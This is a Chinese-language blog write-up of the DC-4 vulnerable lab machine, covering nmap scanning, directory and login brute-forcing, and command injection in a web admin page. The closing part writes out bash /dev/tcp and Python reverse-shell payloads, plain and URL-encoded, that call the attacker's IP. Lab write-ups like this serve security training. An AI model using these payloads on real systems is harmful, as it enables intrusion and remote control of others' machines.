

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#FFD8F2">
  <meta name="author" content="Sweety">
  <meta name="keywords" content="">
  
    <meta name="description" content="DC-4IP扫描通过开关目标靶机来确认目标靶机的IP地址。 1nmap -sN  192.168.204.0&#x2F;24  开靶机前：  开靶机后： 对比之下可以得到目标靶机的IP地址为：192.168.204.133。 端口扫描扫描开放的TCP端口12nmap -sN -p- 192.168.204.133nmap -sT -p- 192.168.204.133  -sN：表示执行Null扫描，Nul">
<meta property="og:type" content="article">
<meta property="og:title" content="DC-4">
<meta property="og:url" content="https://haoisbinlove.github.io/2024/07/24/DC-4/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="DC-4IP扫描通过开关目标靶机来确认目标靶机的IP地址。 1nmap -sN  192.168.204.0&#x2F;24  开靶机前：  开靶机后： 对比之下可以得到目标靶机的IP地址为：192.168.204.133。 端口扫描扫描开放的TCP端口12nmap -sN -p- 192.168.204.133nmap -sT -p- 192.168.204.133  -sN：表示执行Null扫描，Nul">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704224901788.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704224934605.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704225650473.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704230408447.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704231641121.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705134104640.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705134633165.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705134758802.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705135323268.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705135444738.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705210622750.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705210734505.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705212615851.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705213405067.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223514917.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706222807477.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223951881.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706224012970.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223251316.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223327065.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706095837540.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706095909244.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706095954196.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706134153866.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706134704114.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706134737052.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706142153965.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706151934510.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706152723101.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706155330709.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706221743698.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706222057830.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706222458733.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706224633919.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706225050928.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706225933071.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706232255198.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706233427682.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706232619485.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706232913257.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234051092.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706233248963.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234322456.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234350082.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234829075.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234846253.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706235128164.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715131345123.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715131622681.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715131837232.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132113057.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132521386.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132833915.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132958425.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715133158149.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715133710662.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715133858991.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715134104570.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715134313545.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135103294.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135346117.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135445574.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135511759.png">
<meta property="article:published_time" content="2024-07-24T01:31:21.000Z">
<meta property="article:modified_time" content="2024-07-24T13:56:00.508Z">
<meta property="article:author" content="Sweety">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704224901788.png">
  
  
  
  <title>DC-4 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"haoisbinlove.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Sweety Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/24.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.08)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="DC-4"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-07-24 09:31" pubdate>
          2024年7月24日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          31 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">DC-4</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="DC-4"><a href="#DC-4" class="headerlink" title="DC-4"></a>DC-4</h1><h2 id="IP扫描"><a href="#IP扫描" class="headerlink" title="IP扫描"></a>IP扫描</h2><p>通过开关目标靶机来确认目标靶机的IP地址。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sN  192.168.204.0/24<br></code></pre></td></tr></table></figure>

<p>开靶机前：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704224901788.png" srcset="/img/loading.gif" lazyload alt="image-20240704224901788"></p>
<p>开靶机后：<br><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704224934605.png" srcset="/img/loading.gif" lazyload alt="image-20240704224934605"></p>
<p>对比之下可以得到目标靶机的IP地址为：<code>192.168.204.133</code>。</p>
<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><h3 id="扫描开放的TCP端口"><a href="#扫描开放的TCP端口" class="headerlink" title="扫描开放的TCP端口"></a>扫描开放的TCP端口</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sN -p- 192.168.204.133<br>nmap -sT -p- 192.168.204.133<br></code></pre></td></tr></table></figure>

<p><code>-sN</code>：表示执行Null扫描，Null扫描是一种TCP扫描技术。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704225650473.png" srcset="/img/loading.gif" lazyload alt="image-20240704225650473"></p>
<p>扫描结果显示，开放的端口为<code>22</code>端口和<code>80</code>端口。</p>
<h3 id="扫描开放的UDP端口"><a href="#扫描开放的UDP端口" class="headerlink" title="扫描开放的UDP端口"></a>扫描开放的UDP端口</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sU -top-ports 20 -p- 192.168.204.133<br></code></pre></td></tr></table></figure>

<p><code>-sU</code>：表示执行UDP扫描，UDP不建立连接，所以端口扫描和响应的处理方式不同。</p>
<p><code>-top-ports</code>：指定扫描的端口数量，该参数后面跟一个数字。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704230408447.png" srcset="/img/loading.gif" lazyload alt="image-20240704230408447"></p>
<p>根据<code>STATE</code>字段，我们发现还是有蛮多开放的UDP端口的，但是一般不对UDP端口进行测试，其优先级靠后。</p>
<h2 id="端口详细信息扫描（tcp）"><a href="#端口详细信息扫描（tcp）" class="headerlink" title="端口详细信息扫描（tcp）"></a>端口详细信息扫描（tcp）</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sT -sV -sC -O -p 22,80 192.168.204.133<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240704231641121.png" srcset="/img/loading.gif" lazyload alt="image-20240704231641121"></p>
<p>根据扫描结果，可以得知：</p>
<blockquote>
<p>22端口开放的是ssh服务，运行版本为OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)，其中还给出了ssh主机密钥。提示可以进行ssh远程连接。</p>
<p>80端口开放的是http服务，运行版本是nginx 1.15.10。</p>
</blockquote>
<h2 id="nmap漏扫"><a href="#nmap漏扫" class="headerlink" title="nmap漏扫"></a>nmap漏扫</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -script=vuln -p 22,80 192.168.204.133<br></code></pre></td></tr></table></figure>

<p>这次nmap漏扫的响应时间比较长，得到如下结果：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705134104640.png" srcset="/img/loading.gif" lazyload alt="image-20240705134104640"></p>
<p>根据结果可知，80端口http服务可能存在着<code>csrf（跨站请求伪造）</code>漏洞。路径为：</p>
<blockquote>
<p> <a target="_blank" rel="noopener" href="http://192.168.204.133/">http://192.168.204.133:80/</a></p>
<p> <a target="_blank" rel="noopener" href="http://192.168.204.133/login.php">http://192.168.204.133:80/login.php</a></p>
</blockquote>
<p>通过网站浏览可以发现这两个网址打开都是相同的登陆界面。为了便于后续漏洞利用，比如植入一句话木马之类的，我们后续均使用<code>http://192.168.204.133:80/login.php</code></p>
<h2 id="网页信息收集"><a href="#网页信息收集" class="headerlink" title="网页信息收集"></a>网页信息收集</h2><p>访问链接：<code>http://192.168.204.133:80/login.php</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705134633165.png" srcset="/img/loading.gif" lazyload alt="image-20240705134633165"></p>
<p>直接就是一个管理信息系统登陆界面。</p>
<p>使用Wappalyzer查看网页的技术构成：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705134758802.png" srcset="/img/loading.gif" lazyload alt="image-20240705134758802"></p>
<p>没有得到有关网页框架等相关信息，即，没啥有用信息。</p>
<p>既然是登陆界面,自然就要想方设法获取合法的管理员登陆账号。可以先做目录爆破看看能否得到一些有用的资源信息。</p>
<h3 id="gubuster目录爆破"><a href="#gubuster目录爆破" class="headerlink" title="gubuster目录爆破"></a>gubuster目录爆破</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gobuster <span class="hljs-built_in">dir</span> -u http://192.168.204.133 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705135323268.png" srcset="/img/loading.gif" lazyload alt="image-20240705135323268"></p>
<p>似乎没有得到什么有用的信息,访问爆破得到的两个网址:</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://192.168.204.133/images/">http://192.168.204.133/images/</a></p>
<p><a target="_blank" rel="noopener" href="http://192.168.204.133/css/">http://192.168.204.133/css/</a></p>
</blockquote>
<p>两个网页的访问响应都是<code>403 Forbidden</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705135444738.png" srcset="/img/loading.gif" lazyload alt="image-20240705135444738"></p>
<blockquote>
<p><code>403 Forbidden</code>:是指在尝试访问网站或特定页面时,服务器拒绝了请求。发生该问题通常是由于以下原因造成的：权限不足、IP地址限制、访问控制列表（ACL）限制、http身份验证失败、目录列表拒绝、内容过滤或防火墙规则。</p>
</blockquote>
<p>所以这次目录爆破等于无效爆破，爆破出来的目录访问是被服务器拒绝的。</p>
<p>目前为止,捋一下思绪。我们通过nmap漏扫发现了网站可能存在<code>csrf漏洞</code>，然后我们通过目录爆破出来的网址链接，访问均被服务器拒绝。通过Wappalyzer分析网页的技术构成，也没有得到有关于网页框架等有用的信息。</p>
<p>所以,接下来,我们就要以目标网站的csrf漏洞为切入点。</p>
<h3 id="访问存在csrf漏洞的登陆网页"><a href="#访问存在csrf漏洞的登陆网页" class="headerlink" title="访问存在csrf漏洞的登陆网页"></a>访问存在csrf漏洞的登陆网页</h3><p>使用burpsuite进行抓包检查登陆界面上用户名和密码的传输方式。</p>
<p>在登陆界面随机输入一些用户名和密码，然后点击“Submit”：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705210622750.png" srcset="/img/loading.gif" lazyload alt="image-20240705210622750"></p>
<p>查看burpsuite拦截到的数据包：<br><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705210734505.png" srcset="/img/loading.gif" lazyload alt="image-20240705210734505"></p>
<p>得到的信息有：</p>
<blockquote>
<p>请求方式为POST，传输方式是明文：username&#x3D;chfhj&amp;password&#x3D;hkjhk</p>
</blockquote>
<h3 id="burpsuite爆破"><a href="#burpsuite爆破" class="headerlink" title="burpsuite爆破"></a>burpsuite爆破</h3><p>已知账号密码传输的方式以及明文传输格式，因此可以通过抓包进行账号密码的爆破。仅设置<code>username</code>和<code>password</code>两个payload集合，然后通过用户名字典和密码字典进行爆破。(<a target="_blank" rel="noopener" href="http://192.168.204.133/login.php">http://192.168.204.133:80/login.php</a>)</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705212615851.png" srcset="/img/loading.gif" lazyload alt="image-20240705212615851"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240705213405067.png" srcset="/img/loading.gif" lazyload alt="image-20240705213405067"></p>
<p>之后就是设置<code>payload</code>。注意，在前面<code>positions</code>选中了多少个爆破变量位置，后面就要设置多少个<code>payload</code>，set下的数字代表的是position 参数编号。需要按序分别选择然后导入爆破字典。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223514917.png" srcset="/img/loading.gif" lazyload alt="image-20240706223514917"></p>
<p>设置完<code>payload</code>之后就可以点击右上角的<code>start attack</code>开始进行攻击。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706222807477.png" srcset="/img/loading.gif" lazyload alt="image-20240706222807477"></p>
<p>爆破完后（当然也可以是在爆破之前）进行过滤设置。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223951881.png" srcset="/img/loading.gif" lazyload alt="image-20240706223951881"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706224012970.png" srcset="/img/loading.gif" lazyload alt="image-20240706224012970"></p>
<p>设置只显示状态码为2xx系列成功的数据包。</p>
<p>爆破（花了很长时间）得到用户名和密码：</p>
<blockquote>
<p>username：admin     password：happy</p>
</blockquote>
<p>但是爆破结果不仅得到了上面的账号和密码，还有其它的爆破成功的用户名密码对：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223251316.png" srcset="/img/loading.gif" lazyload alt="image-20240706223251316"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706223327065.png" srcset="/img/loading.gif" lazyload alt="image-20240706223327065"></p>
<h2 id="Get-shell"><a href="#Get-shell" class="headerlink" title="Get shell"></a>Get shell</h2><p>使用上述爆破得到的账号密码进行登陆。登陆后的界面如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706095837540.png" srcset="/img/loading.gif" lazyload alt="image-20240706095837540"></p>
<p>点击“Command”得到如下界面：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706095909244.png" srcset="/img/loading.gif" lazyload alt="image-20240706095909244"></p>
<p>点击“Run”：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706095954196.png" srcset="/img/loading.gif" lazyload alt="image-20240706095954196"></p>
<p>有提示信息：<code>You have selected: ls -l</code>，似乎在指示，我们通过前端执行了命令<code> ls -l</code>。尝试抓包看看是否能够更改这条指令。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706134153866.png" srcset="/img/loading.gif" lazyload alt="image-20240706134153866"></p>
<p>可以看到的是，抓取的包以明文的形式显示出了<code>ls -l</code>指令，即<code>ls+-l</code>。尝试修改该指令并进行重放。将其修改为<code>cat index.php</code>即,<code>cat+index.php</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706134704114.png" srcset="/img/loading.gif" lazyload alt="image-20240706134704114"></p>
<p>然后进行放行! </p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706134737052.png" srcset="/img/loading.gif" lazyload alt="image-20240706134737052"></p>
<p>ok!成功地执行了我们修改的命令。so！我们就可以通过命令来反弹shell了。</p>
<h3 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h3><ul>
<li><p>实践gpt上面的反弹shell操作方案</p>
<p>首先需要现在攻击机进行端口监听：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -nvlp 9999<br>/bin/bash -i &gt;&amp; /dev/tcp/192.168.204.128/9999 0&gt;&amp;1<br>burpsuite编码：<br>/bin/bash%20-i%20%3E%26%20/dev/tcp/192.168.204.128/9999%200%3E%261<br></code></pre></td></tr></table></figure>

<p>这里的IP地址是攻击机（kali）的IP地址。</p>
</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706142153965.png" srcset="/img/loading.gif" lazyload alt="image-20240706142153965"></p>
<p>好！失败。。。</p>
<ul>
<li>编写脚本进行命令注入，进而实现反弹shell</li>
</ul>
<p>首先编写反弹脚本：</p>
<p>设置监听目标IP以及监听端口。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">import socket,subprocess,os;<br>s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);<br>s.connect((&quot;<span class="hljs-number">192.168</span>.<span class="hljs-number">204.128</span>&quot;,<span class="hljs-number">9999</span>));<br>os.dup2(s.fileno(),0);<br>os.dup2(s.fileno(),1); <br>os.dup2(s.fileno(),2);<br>p=subprocess.call([<span class="hljs-string">&quot;/bin/sh&quot;</span>,<span class="hljs-string">&quot;-i&quot;</span>]);<br></code></pre></td></tr></table></figure>

<p>然后直接在终端命令行执行脚本代码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">python3 -c <span class="hljs-string">&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.204.128&quot;,9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span><br><br>python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%<span class="hljs-number">22192.168</span>.<span class="hljs-number">204.128</span>%<span class="hljs-number">22</span>,<span class="hljs-number">9999</span>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27<br><br></code></pre></td></tr></table></figure>

